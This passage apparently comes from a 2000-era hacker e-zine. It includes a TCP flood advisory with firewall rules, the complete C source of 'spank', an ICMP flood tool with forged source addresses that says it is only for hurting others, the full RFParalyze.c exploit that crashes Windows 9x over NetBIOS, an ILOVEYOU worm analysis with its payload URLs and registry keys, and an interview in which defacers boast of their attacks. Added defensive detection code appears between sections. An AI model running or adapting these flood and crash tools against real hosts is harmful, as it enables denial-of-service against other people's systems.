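struct tally replay_flood(struct stack *s, unsigned n, uint32_t now)
{
    struct tally t = { {0} };
    uint32_t x = 1;
    for (unsigned i = 0; i < n; i++) {
        x = x * 1664525u + 1013904223u;          /* varying sample sources */
        struct seg p = { 0x0A000000u | (x >> 8), 0xC0000201u, 80, TH_ACK };
        if (i % 4 == 3)
            p.dst = 0xE0000001u;
        t.v[classify(s, &p, now)]++;
    }
    return t;
}

int main(void)
{
    struct stack s = new_stack(200);
    struct tally t = replay_flood(&s, 1000, 100);
    printf("multicast dropped=%u  RST sent=%u  RST suppressed=%u  lookups=%u\n",
           t.v[DROP_MULTICAST], t.v[SEND_RST], t.v[DROP_RATE_LIMITED], s.lookups);
    return 0;
}
```

With the budget in place the host answers at most `rst_limit` unmatched segments per second, so the return traffic described above (ICMP unreachables bounced back from nonexistent spoofed hosts) is bounded no matter how fast the flood arrives.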
---------------------------------------------------
Temporary remedy
---------------------------------------------------
If you use ipfilter, this MAY help you, but the issue is quite a bit
different than the previous issue.
-- start rule set --
# 224.0.0.0/4 is the entire IPv4 multicast (class D) range
block in quick proto tcp from any to any head 100
block in quick proto tcp from 224.0.0.0/4 to any group 100
pass in quick proto tcp from any to any flags S keep state group 100
pass out proto tcp from any to any flags S keep state
pass in all
-- end rule set --
Optionally, a rule like the following could be inserted to handle outgoing
packets (if they send from the firewall somehow), but you have bigger
problems than the attack if that is the case.
-- start additional rule --
block out proto tcp from any to 224.0.0.0/4
-- end additional rule --
That will help you "stop" the attack (actually it will just help minimize
the effects), although it will still use some CPU.
Note: If you use IPFW, there is no immediate way to solve this problem due
to the fact that it is a stateless firewall. If you are getting attacked,
then temporarily use ipfilter (or any other state based firewall) to stop
it. Otherwise, wait for vendor patches or read more about the explanation
for other possible workarounds.
FreeBSD "unofficial patch" by Don Lewis:
http://solid.ncsa.uiuc.edu/~liquid/patch/don_lewis_tcp.diff
-----------------------
Conclusion
-----------------------
This bug was found in testing. It seems a bit more lethal than the
previous and should be addressed as such. Patches should be available now,
but I do not follow all the platforms.
--------------------
References
--------------------
This was done independently, although some of the analysis and reverse
engineering of concept was done by other people. As a result, I would like
to give credit where credit is due. The following people contributed in
some way or another:
Brett Glass <brett@lariat.org>
Alfred Perlstein <bright@wintelcom.net>
Warner Losh <imp@village.org>
Darren Reed <avalon@coombs.anu.edu.au>
Don Lewis <Don.Lewis@tsc.tdk.com>
Also, I would like to send shouts out to w00w00 (http://www.w00w00.org)
-------------------
Attached
-------------------
These programs are for the sake of full disclosure, don't abuse
them. Spank was written with libnet, so you will need to obtain that as
well. You can find that at http://www.packetfactory.net/libnet
For an "unofficial" patch:
http://www.w00w00.org/files/spank/don_lewis_tcp.diff
For spank.c:
http://www.w00w00.org/files/spank/spank.c
-=-
/*
* spank.c by fred_ | blasphemy
*
* @@@@@@ @@@@@@@ @@@@@@ @@@ @@@ @@@ @@@
* @@@@@@@ @@@@@@@@ @@@@@@@@ @@@@ @@@ @@@ @@@
* !@@ @@! @@@ @@! @@@ @@!@!@@@ @@! !@@
* !@! !@! @!@ !@! @!@ !@!!@!@! !@! @!!
* !!@@!! @!@@!@! @!@!@!@! @!@ !!@! @!@@!@!
* !!@!!! !!@!!! !!!@!!!! !@! !!! !!@!!!
* !:! !!: !!: !!! !!: !!! !!: :!!
* !:! :!: :!: !:! :!: !:! :!: !:!
* :::: :: :: :: ::: :: :: :: :::
* :: : : : : : : :: : : :::
*
* This program is not for educational use
* in any shape or form. You must agree that
* you will only use it to hurt others.
*
* Warning, this program uses alot of bandwidth.
*
* usage: ./spank <source> <destination> <size>
*
*/
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/ip_icmp.h>
static int in_cksum(u_short *addr, int len);
static void fill(int datalen, char *icmp_data);
#define PHDR_LEN sizeof(struct icmphdr) + sizeof(struct iphdr)
static void
fill(int datalen, char *icmp_data)
{
static u_int32_t rnd;
int i;
for (i = PHDR_LEN; i < datalen; i++) {
rnd = (3141592621U * rnd + 663896637U);
icmp_data[i] = rnd>>24;
}
}
int
main(int argc, char *argv[])
{
int count = 0, sock, x;
struct sockaddr_in sin;
fprintf(stdout, "spank.c coded by fred_ | blasphemy\n");
if (argc != 4) {
fprintf(stderr,
"ex., %s <source> <destination> <size>\n",
argv[0]);
exit(1);
}
if (atoi(argv[3]) < 1) {
fprintf(stderr,
"error: packet size is too small.\n");
exit(1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(0);
sin.sin_addr.s_addr = get_addr(argv[2]);
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sock < 0) {
perror("socket()");
exit(1);
}
setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &x, sizeof(x));
printf("each '.' is 25 packets\n");
while (1) {
send_packet(argv[1],
atoi(argv[3]), sin, sock);
count++;
if (count == 25) {
printf(".");
fflush(stdout);
count = 0;
}
usleep(10);
}
}
int get_addr(char *host)
{
static struct in_addr h;
struct hostent *hp;
h.s_addr = inet_addr(host);
if (h.s_addr == -1) {
hp = gethostbyname(host);
if (hp == NULL) {
fprintf(stderr,
"unable to resolve %s.\n", host);
exit(1);
}
bcopy(hp->h_addr, (char *)&h.s_addr, hp->h_length);
}
return h.s_addr;
}
int send_packet(char *src, int size,
struct sockaddr_in sin, int sock)
{
char *packet;
struct icmphdr *icmp;
struct iphdr *ip;
packet = (char *) malloc(PHDR_LEN + size);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
memset(packet, 0, PHDR_LEN);
fill(size, packet);
ip->tot_len = htons(PHDR_LEN + size);
ip->ihl = 5;
ip->ttl = 255;
ip->protocol = IPPROTO_ICMP;
ip->version = 4;
ip->tos = 0;
ip->frag_off = 0;
ip->saddr = get_addr(src);
ip->daddr = sin.sin_addr.s_addr;
ip->check = in_cksum((u_short *)ip,
sizeof(struct iphdr));
icmp->type = 8;
icmp->code = 1;
icmp->checksum = in_cksum((u_short *)icmp,
sizeof(struct icmphdr));
if (sendto(sock, packet, PHDR_LEN + size,
0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1) {
close(sock);
perror("sendto()");
exit(1);
}
free(packet);
}
static int
in_cksum(u_short *addr, int len)
{
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) addr;
sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
@HWA
15.0 [IND] RFParalyse.c:Cause undesired effects remotely against Win9x;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: http://www.wiretrip.net/rfp/
http://www.el8.org/adv/05012000_win98_winpopup.txt
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--
/ /
/ e / - el8.org advisory
/ l /
/ 8 / - Evan Brewer <dm@el8.org>
/ . / - Rain Forest Puppy <rfp@wiretrip.net>
/ o /
/ r / - Synopsis: Cause undesired effects remotely against
/ g / win9[5,8] through an oddly formed winpopup message.
/ /
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--
Details:
Through a netbios session request packet with a NULL source name,
Windows 9[5,8] show a number of odd responses. Everything from
lockups, reboots and "the blue screen of death", to total loss of
network connectivity.
Note that neither el8 nor wiretrip discovered the vulnerability;
instead, a binary-only exploit found in the wild was reversed,
and the demonstration code attached was reconstructed. So it
should be noted:
THIS HAS BEEN FOUND IN THE WILD
The vulnerability specifically targets the Messenger service on
Windows 9[5,8]. At this point, it's doubtful there's anything
more worthy than a DoS capable. However, any information to the
contrary would be appreciated. :)
Source:
Attached is a quick hack called RFParalyze.c
Greets:
ADM / w00w00 / everyone at el8.org
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--
/*********************************** www.el8.org **** www.wiretrip.net **/
/* - el8.org advisory: RFParalyze.c
code by rain forest puppy <rfp@wiretrip.net> -
coolness exhibited by Evan Brewer <dm@el8.org> -
- Usage: RFParalyze <IP address> <NetBIOS name>
where <IP address> is the IP address (duh) of the target (note:
not DNS name). <NetBIOS name> is the NetBIOS name (again, duh) of
the server at the IP address given. A kiddie worth his scripts
should be able to figure out how to lookup the NetBIOS name.
Note: NetBIOS name must be in upper case.
This code was made from a reverse-engineer of 'whisper', a
binary-only exploit found in the wild.
I have only tested this code on Linux. Hey, at least it's
not in perl... ;) -rfp
*/
#include <stdio.h> /* It's such a shame to waste */
#include <stdlib.h> /* this usable space. Instead, */
#include <string.h> /* we'll just make it more */
#include <netdb.h> /* props to the men and women */
#include <sys/socket.h> /* (hi Tabi!) of #!adm and */
#include <sys/types.h> /* #!w00w00, because they rock */
#include <netinet/in.h> /* so much. And we can't forget*/
#include <unistd.h> /* our friends at eEye or */
#include <string.h> /* Attrition. Oh, +hi Sioda. :) */
/* Magic winpopup message
This is from \\Beav\beavis and says "yeh yeh"
Ron and Marty should like the hardcoded values this has ;)
*/
char blowup[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"
"\x53\x00\x01\x08\x00\x79\x65\x70\x20\x79\x65\x70\x00\x00";
struct sreq /* little structure of netbios session request */
{
char first[5];
char yoname[32];
char sep[2];
char myname[32];
char end[1];
};
void Pad_Name(char *name1, char *name2); /* Thanks Antilove/ADM 4 codez!*/
int main(int argc, char *argv[]){
char buf[4000], myname[33], yoname[33];
struct sockaddr_in sin;
int sox, connex, x;
struct sreq smbreq;
printf("RFParalyze -- this code by rfp/ADM/Wiretrip/ and dm/el8/\n");
if (argc < 3) {
printf("Usage: RFParalyze <IP of target> <NetBIOS name>\n");
printf(" --IP must be ip address, not dns\n");
printf(" --NetBIOS name must be in UPPER CASE\n\n");
exit(1);}
printf("Greetz to el8.org, Technotronic, w00w00, USSR, and ADM!\n");
Pad_Name("WICCA",myname); /* greetz to Simple Nomad/NMRC */
myname[30]='A'; /* how was Beltaine? :) */
myname[31]='D';
Pad_Name(argv[2],yoname);
yoname[30]='A';
yoname[31]='D';
printf("Trying %s as NetBIOS name %s \n",argv[1],argv[2]);
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_family = AF_INET;
sin.sin_port = htons(139);
sox = socket(AF_INET,SOCK_STREAM,0);
if((connex = connect(sox,(struct sockaddr_in *)&sin,sizeof(sin))) < 0){
perror("Problems connecting: ");
exit(1);}
memset(buf,0,4000);
memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5); /*various netbios stuffz*/
memcpy(smbreq.sep,"\x00\x20",2); /*no need to worry about*/
memcpy(smbreq.end,"\x00",1); /*what it does :) */
strncpy(smbreq.myname,myname,32);
strncpy(smbreq.yoname,yoname,32);
write(sox,&smbreq,72); /* send initial request */
x=read(sox,buf,4000); /* get their response */
if(x<1){ printf("Problem, didn't get response\n");
exit(1);}
if(buf[0]=='\x82') printf("Enemy engaged, going in for the kill...");
else {printf("We didn't get back the A-OK, bailing.\n");
exit(1);}
write(sox,&blowup,72); /* send the magic message >:) */
x=read(sox,buf,4000); /* we really don't care, but sure */
close(sox);
printf("done\n");
}
void Pad_Name(char *name1, char *name2)
{ char c, c1, c2;
int i, len;
len = strlen(name1);
for (i = 0; i < 16; i++) {
if (i >= len) {
c1 = 'C'; c2 = 'A'; /* CA is a space */
} else {
c = name1[i];
c1 = (char)((int)c/16 + (int)'A');
c2 = (char)((int)c%16 + (int)'A');
}
name2[i*2] = c1;
name2[i*2+1] = c2;
}
name2[32] = 0; /* Put in the null ...*/
}
/*********************************** www.el8.org **** www.wiretrip.net **/
-/-\----/-\----/-\----/-\----/-\----/-\---/ fjear the ASCii skillz \---/-\-
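A defensive counterpart to the session request built above, as an added example that is not part of the advisory or of RFParalyze.c: it parses a NetBIOS session request, reverses the Pad_Name encoding, and flags a calling (source) name that decodes to nothing. Treating a name made only of NUL or space bytes as the advisory's "NULL source name" is an assumption; the function names and the sample host names are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum sr_result { SR_OK, SR_NOT_SESSION_REQUEST, SR_MALFORMED, SR_EMPTY_CALLING };

struct sr_names {
    char called[16];                        /* up to 15 characters + NUL */
    char calling[16];
    uint8_t called_suffix, calling_suffix;  /* 16th name byte: service type */
};

/* One name field on the wire: 0x20 length byte, 32 encoded bytes, 0x00.
 * Each raw byte was split into two nibbles, each sent as 'A' + nibble. */
static int decode_name(const uint8_t *f, uint8_t raw[16])
{
    if (f[0] != 0x20 || f[33] != 0x00)
        return -1;
    for (int i = 0; i < 16; i++) {
        uint8_t hi = (uint8_t)(f[1 + 2 * i] - 'A');
        uint8_t lo = (uint8_t)(f[2 + 2 * i] - 'A');
        if (hi > 15 || lo > 15)
            return -1;
        raw[i] = (uint8_t)((hi << 4) | lo);
    }
    return 0;
}

/* Copies the 15 name bytes as text without space/NUL padding; returns length. */
static int name_text(const uint8_t raw[16], char out[16])
{
    int n = 15;
    while (n > 0 && (raw[n - 1] == ' ' || raw[n - 1] == 0))
        n--;
    for (int i = 0; i < n; i++)
        out[i] = (raw[i] >= 0x20 && raw[i] < 0x7f) ? (char)raw[i] : '?';
    out[n] = '\0';
    return n;
}

enum sr_result inspect_session_request(const uint8_t *pkt, size_t len,
                                       struct sr_names *o)
{
    uint8_t called[16], calling[16];
    if (len < 4 || pkt[0] != 0x81)          /* 0x81 = session request */
        return SR_NOT_SESSION_REQUEST;
    /* 17-bit length: low bit of the flags byte plus the 16-bit length field */
    size_t body = ((size_t)(pkt[1] & 1) << 16) | ((size_t)pkt[2] << 8) | pkt[3];
    if (body != 68 || len < 4 + body)       /* two 34-byte name fields */
        return SR_MALFORMED;
    if (decode_name(pkt + 4, called) || decode_name(pkt + 38, calling))
        return SR_MALFORMED;
    name_text(called, o->called);
    o->called_suffix = called[15];
    o->calling_suffix = calling[15];
    return name_text(calling, o->calling) == 0 ? SR_EMPTY_CALLING : SR_OK;
}

/* Helpers that build constructed sample input for the parser. */
static void encode_name(const char *name, uint8_t *f)
{
    size_t n = strlen(name);
    f[0] = 0x20;
    for (size_t i = 0; i < 16; i++) {
        uint8_t c = (i < n && i < 15) ? (uint8_t)name[i] : (uint8_t)' ';
        f[1 + 2 * i] = (uint8_t)('A' + (c >> 4));
        f[2 + 2 * i] = (uint8_t)('A' + (c & 15));
    }
    f[33] = 0x00;
}

void sample_request(const char *called, const char *calling, uint8_t out[72])
{
    out[0] = 0x81; out[1] = 0x00; out[2] = 0x00; out[3] = 68;
    encode_name(called, out + 4);
    encode_name(calling, out + 38);
}

int main(void)
{
    uint8_t pkt[72];
    struct sr_names n;
    sample_request("FILESRV", "WORKSTATION1", pkt);
    printf("normal request  -> %d (%s <- %s)\n",
           inspect_session_request(pkt, sizeof pkt, &n), n.called, n.calling);
    memset(pkt + 39, 'A', 32);              /* calling name of 16 NUL bytes */
    printf("empty calling   -> %d\n",
           inspect_session_request(pkt, sizeof pkt, &n));
    return 0;
}
```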
@HWA
16.0 [MM] New worm: ILOVEYOU spreads via e-mail attachments
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This email worm originated in the Philippines. When I first became aware
of it Britain was being hit hard by the nuisance, and by late afternoon
the same day it had proliferated across the net to the U.S and Canada.
I got a call from my sister at work who had received 16 ILOVEYOU emails
at that time, later on the media began reporting it and in my news
emails that were warning of the virus the very same emails were themselves
infected and multiple copies were received.
Not 24hrs had passed before several variations of the insidious pest had
appeared such as the JOKE and VERY FUNNY variations. You'd think we were
past this sort of annoyance but it seems shoddy programming and planning
is going to be a fact of life for a good while to come yet. - Ed
Media:
Source: http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000504095618.N24513@securityfocus.com
To:BugTraq
Subject:ILOVEYOU worm
Date:Wed May 03 2000 18:56:18
Author: Elias Levy
Message-ID:<20000504095618.N24513@securityfocus.com>
A new VB worm is on the loose. This would normally not be bugtraq
material as it exploits no new flaws but it has spread enough that it
warrants some coverage. This is a quick and dirty analysis of what it does.
The worm spreads via email as an attachment and via IRC as a DCC download.
The first thing the worm does when executed is save itself to three
different locations. Under the system directory as MSKernel32.vbs and
LOVE-LETTER-FOR-YOU.TXT.vbs and under the windows directory as
Win32DLL.vbs.
It then creates a number of registry entries to execute these programs
when the machine restarts. These entries are:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
It will also modify Internet Explorer's start page to point to a web page
that downloads a binary called WIN-BUGSFIX.exe. It randomly selects between
four different URLs:
http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe
http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe
http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe
http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe
I've not been able to obtain a copy of the binary to figure out what it does.
This does mean the worm has a dynamic component that may change its
behavior any time the binary is changed and a new one downloaded.
The worm then changes a number of registry keys to run the downloaded binary
and to clean up after itself.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
about:blank
The worm then creates an HTML file that helps it spread,
LOVE-LETTER-FOR-YOU.HTM. This is the file DCC'ed to others on IRC.
The worm then spreads to all addresses in the Windows Address Book by
sending the file LOVE-LETTER-FOR-YOU.TXT.vbs as an attachment. The
email starts:
kindly check the attached LOVELETTER coming from me.
Then the virus searches for attached drives looking for files with
certain extensions. It overwrites files ending with vbs, and vbe.
It overwrites files ending with js, jse, css, wsh, sct, and hta, and
then renames them to end with vbs. It overwrites files ending with jpg
and jpeg and appends .vbs to their name. It finds files with the name
mp3 and mp3, creates vbs files with the same name and sets the hidden
attribute in the original mp* files.
Then it looks for the mIRC windows IRC client and overwrites the script.ini
file if found. It modifies this file so that it will DCC the
LOVE-LETTER-FOR-YOU.HTM file to any people that join a channel the
client is in.
You can find the source of the worm at:
http://www.securityfocus.com/templates/archive.pike?list=82&msg=3911840F.D7597030@thievco.com&part=.1
--
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum
-=-
I-Worm.LoveLetter
I-Worm.LoveLetter is an Internet worm written in the scripting language "Visual Basic Script"
(VBS). It works only on computers on which the Windows Scripting Host (WSH) is installed. In
Windows 98 and Windows 2000, WSH is installed by default. The worm performs destructive
actions and sends its copy by E-mail.
Destructive actions
After starting from the VBS file the worm searches all files on all local and mapped network
drives. For some extensions of filenames the worm does the following:
VBS, VBE:
    Overwrites files with the worm body.
JS, JSE, CSS, VSH, HST, HTA:
    Creates a new file with original filename and extension .VBS and deletes original file.
JPG, JPEG:
    Creates new file with extension .VBS (adds this extension to old file name and extension) (i.e.
    PIC1.JPG.VBS). Writes worm body to it and deletes original file.
MP2, MP3:
    Creates a new file with extension .VBS (adds to old file name, see above for details). It writes
    its body to it and sets the file attribute "hidden" to the original file.
MIRC32.EXE, MLINK32.EXE, SCRIPT.INI, MIRC.HLP, MIRC.INI:
    If one of these files was found the worm creates the file SCRIPT.INI in the directory where one of
    the above files resides.
The worm also creates some files with its body in system directory.
MSKERNEL32.VBS, WIN32DLL.VBS, LOVE-LETTER-FOR-YOU.TXT.VBS
It sets the appropriate keys in the system registry (Automatic run keys) with full names of files:
MSKernel32.vbs, Win32DLL.vbs
It adds system registry keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
Spreading via E-mail
The worm sends itself via E-mail. To achieve this the worm sends itself to each address from
address book. It works only when the email program Outlook 97/98/2000 is installed.
The letter's subject:
ILOVEYOU
Message body:
kindly check the attached LOVELETTER coming from me.
Attached file name:
LOVE-LETTER-FOR-YOU.TXT.vbs
The virus creates an HTML dropper in Windows system directory. The HTML dropper displays
the message:
This HTML file need ActiveX Control
To Enable to read this HTML file
- Please press 'YES' button to Enable ActiveX
After this the dropper creates the MSKERNEL32.VBS with the worm body and sets it for auto
execution from system registry.
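The artifacts named in the two write-ups above, turned into a host triage check. This is an added example, not code from the BugTraq post or the AV description; the inventory tuples, the sample paths and the example.invalid start-page URL are constructed for illustration.

```python
import ntpath
import re

# Artifact names as given in the two write-ups above (compared case-insensitively).
DROPPED_FILES = {"mskernel32.vbs", "win32dll.vbs",
                 "love-letter-for-you.txt.vbs", "love-letter-for-you.htm"}
RUN_VALUES = {"mskernel32", "win32dll", "win-bugsfix"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Services)?$", re.IGNORECASE)
START_PAGE_KEY = re.compile(r"\\Internet Explorer\\Main$", re.IGNORECASE)
DECOY_EXTS = {"txt", "jpg", "jpeg", "mp2", "mp3"}  # harmless-looking inner extension
SCRIPT_EXTS = {"vbs", "vbe"}                       # what Windows Script Host runs


def decoy_extension(filename):
    """Return the inner extension of a name like PIC1.JPG.VBS, else None."""
    parts = filename.lower().split(".")
    if len(parts) >= 3 and parts[-1] in SCRIPT_EXTS and parts[-2] in DECOY_EXTS:
        return parts[-2]
    return None


def triage(files, registry):
    """files: iterable of (path, is_hidden); registry: iterable of (key, value, data).

    Returns a sorted list of (finding_kind, detail) tuples.
    """
    files = list(files)
    findings = set()
    present = {path.lower() for path, _ in files}
    for path, is_hidden in files:
        name = ntpath.basename(path).lower()
        if name in DROPPED_FILES:
            findings.add(("dropped-file", path))
        elif decoy_extension(name):
            findings.add(("double-extension", path))
        # MP2/MP3 originals stay on disk but are hidden beside a .vbs copy.
        if is_hidden and path.lower() + ".vbs" in present:
            findings.add(("hidden-original", path))
    for key, value, data in registry:
        if RUN_KEY.search(key) and value.lower() in RUN_VALUES:
            findings.add(("run-key", key + "\\" + value))
        if (START_PAGE_KEY.search(key) and value.lower() == "start page"
                and data.lower().endswith("/win-bugsfix.exe")):
            findings.add(("start-page", data))
    return sorted(findings)


# Constructed sample inventory (not taken from a real host).
SAMPLE_FILES = [
    (r"C:\WINDOWS\SYSTEM\MSKernel32.vbs", False),
    (r"C:\WINDOWS\Win32DLL.vbs", False),
    (r"C:\My Documents\PIC1.JPG.VBS", False),
    (r"C:\Music\track.mp3", True),
    (r"C:\Music\track.mp3.vbs", False),
    (r"C:\My Documents\report.txt", False),
    (r"C:\Scripts\backup.vbs", False),   # ordinary admin script, must not be flagged
]
SAMPLE_REGISTRY = [
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
     "MSKernel32", r"C:\WINDOWS\SYSTEM\MSKernel32.vbs"),
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
     "SystemTray", "SysTray.Exe"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main",
     "Start Page", "http://example.invalid/placeholder/WIN-BUGSFIX.exe"),
]

if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_FILES, SAMPLE_REGISTRY):
        print(f"{kind:17} {detail}")
```

Files overwritten in place (existing .vbs/.vbe) keep their names, so a name-based check like this one cannot see them; those need a content comparison against a known-good copy.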
@HWA
17.0 [HWA] May 4th 2000: SugarKing interviews ph33r the b33r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exclusive interview by HWA staff writer SugarKing
Contact him at: sugaking@gis.net
Or editor at: cruciphux@dok.org
Session Start: Thu May 04 21:15:55 2000
[21:15] *** Now talking in #vivalaresistance
[21:16] <p4ntera> lets do this
[21:16] <SugarKing> lock the channel
[21:16] <p4ntera> no one knows of it
[21:16] <p4ntera> i cant
[21:16] <p4ntera> lol
[21:16] <SugarKing> ok
[21:16] <SugarKing> heh
[21:16] <SugarKing> one sec bro
[21:16] <p4ntera> werd
[21:16] <SugarKing> talking to a chick on the phone:)
[21:17] <p4ntera> heh
[21:17] <p4ntera> hurry mon aint got much time
[21:17] <SugarKing> alright
[21:17] <SugarKing> logging now
[21:17] <SugarKing> aight
[21:17] <SugarKing> you guys don't have to answer anything
[21:17] <SugarKing> just say no comment:)
[21:17] <p4ntera> iight
<SNIP>
[21:17] <p4ntera> wtf
[21:17] <SugarKing> heh
[21:18] <Da_Pest> Whats up?
[21:18] <Da_Pest> Yo we gonna start?
[21:18] <SugarKing> so how long has ph33r the b33r been a group?
[21:18] <SugarKing> we're already starting:)
[21:18] <p4ntera> well
[21:18] <Da_Pest> Ok : )
[21:18] <p4ntera> i recruited people from the early october
[21:18] <p4ntera> so lets say october
[21:18] <SugarKing> ok...
[21:18] <Da_Pest> I joined probably in december or november
[21:18] <Da_Pest> Which one was it p4ntera?
[21:18] <p4ntera> november
[21:19] <Da_Pest> k
[21:19] <SugarKing> so you started the group, p4ntera?
[21:19] <p4ntera> yes
[21:19] <SugarKing> any reason?
[21:19] <p4ntera> well
[21:19] <SugarKing> and what's with the name?
[21:19] <p4ntera> because there wasn't much action going around in the underground
[21:19] <Da_Pest> LoL
[21:19] <Da_Pest> that name is joax
[21:19] <p4ntera> so
[21:19] <p4ntera> i wanted people to know the "scene" aint dead
[21:19] <p4ntera> the name?
[21:19] <p4ntera> lmao
[21:19] <p4ntera> well its a LONNNG story
[21:20] <Da_Pest> Very long
[21:20] <SugarKing> heh
[21:20] <p4ntera> yeah
[21:20] <Da_Pest> he told me once
[21:20] <Da_Pest> Dont wanna hear it again
[21:20] <p4ntera> u still wanna hear it?
[21:20] <SugarKing> nah that's ok
[21:20] <SugarKing> save some time
[21:20] <p4ntera> yeah
[21:20] <SugarKing> so how many members to date?
[21:20] <p4ntera> holy shit
[21:20] <p4ntera> loll
[21:20] <p4ntera> 14+
[21:20] <Da_Pest> 15?
[21:20] <p4ntera> most are just shadow members
[21:20] <p4ntera> who remain in the background
[21:20] <Da_Pest> Yah
[21:21] <Da_Pest> Wait let me think
[21:21] <Da_Pest> Yah 15 or 16 i can remember
[21:21] <SugarKing> that's alot
[21:21] <p4ntera> yeah
[21:21] <SugarKing> u guys know how many sites you've defaced so far?
[21:21] <p4ntera> next?
[21:21] <p4ntera> another holy shit =)
[21:21] <p4ntera> i would say 20+
[21:21] <Da_Pest> LoL
[21:21] <SugarKing> or don't keep count?
[21:21] <SugarKing> 20+?
[21:21] <p4ntera> yeah
[21:21] <SugarKing> I would say 40
[21:22] <Da_Pest> And many more to come
[21:22] <SugarKing> just guessing
[21:22] <SugarKing> heh
[21:22] <p4ntera> well
[21:22] <p4ntera> i dont wanna sound cocky
[21:22] <p4ntera> =)
[21:22] <SugarKing> why do you guys deface? fame?
[21:22] <p4ntera> nah
[21:22] <p4ntera> well i like to show people the underground aint dead
[21:22] <p4ntera> and well
[21:22] <p4ntera> some for fame too
[21:22] <p4ntera> but not all
[21:23] <SugarKing> what do you mean "the underground aint dead"?
[21:23] <Da_Pest> Yah i agree
[21:23] <p4ntera> hence why we havent defaced the higher up sites
[21:23] <p4ntera> well
[21:23] <p4ntera> look on attrition
[21:23] <p4ntera> mostly frontpage kiddies, or brazilian kids who cant speak
[21:23] <p4ntera> english
[21:23] <p4ntera> or both
[21:23] <SugarKing> hah ya
[21:23] <Da_Pest> MSADC GALORE
[21:23] <p4ntera> i say the 2 go together in the same sentence
[21:23] <Da_Pest> HAHA
[21:23] <p4ntera> da_pest, dont even give em that =)
[21:23] <Da_Pest> lol
[21:23] <Da_Pest> Tru dat
[21:24] <SugarKing> hah
[21:24] <p4ntera> next?
[21:24] <SugarKing> you guys afraid of being busted?
[21:24] <p4ntera> hell yeah
[21:24] <Da_Pest> Of course
[21:24] <p4ntera> i dont wanna have a friend named backdoor billy
[21:24] <SugarKing> then why do you keep defacing?
[21:24] <p4ntera> well
[21:24] <Da_Pest> You think i want bull shit on my record lol
[21:24] <p4ntera> we're in it now
[21:24] <p4ntera> we can't stop
[21:24] <p4ntera> plus i dont wanna
[21:25] <SugarKing> ya you can
[21:25] <SugarKing> I did
[21:25] <SugarKing> don't wanna? why?
[21:25] <p4ntera> i cover my tracks well, and i hide myself
[21:25] <p4ntera> i like defacing
[21:25] <Da_Pest> Plus we said we are afraid of gettin caught but i personally enjoy the rush of the chance of getting caught
[21:25] <Da_Pest> same
[21:25] <Da_Pest> :)
[21:25] <p4ntera> hes right
[21:25] <SugarKing> what about ethics?
[21:25] <p4ntera> well
[21:25] <SugarKing> i did it for awhile
[21:25] <p4ntera> i rarely do medical sites
[21:26] <SugarKing> but i don't think it's right
[21:26] <SugarKing> not needed
[21:26] <p4ntera> no msadc
[21:26] <SugarKing> eh
[21:26] <SugarKing> heh
[21:26] <p4ntera> and usually if i feel sorry for the admin
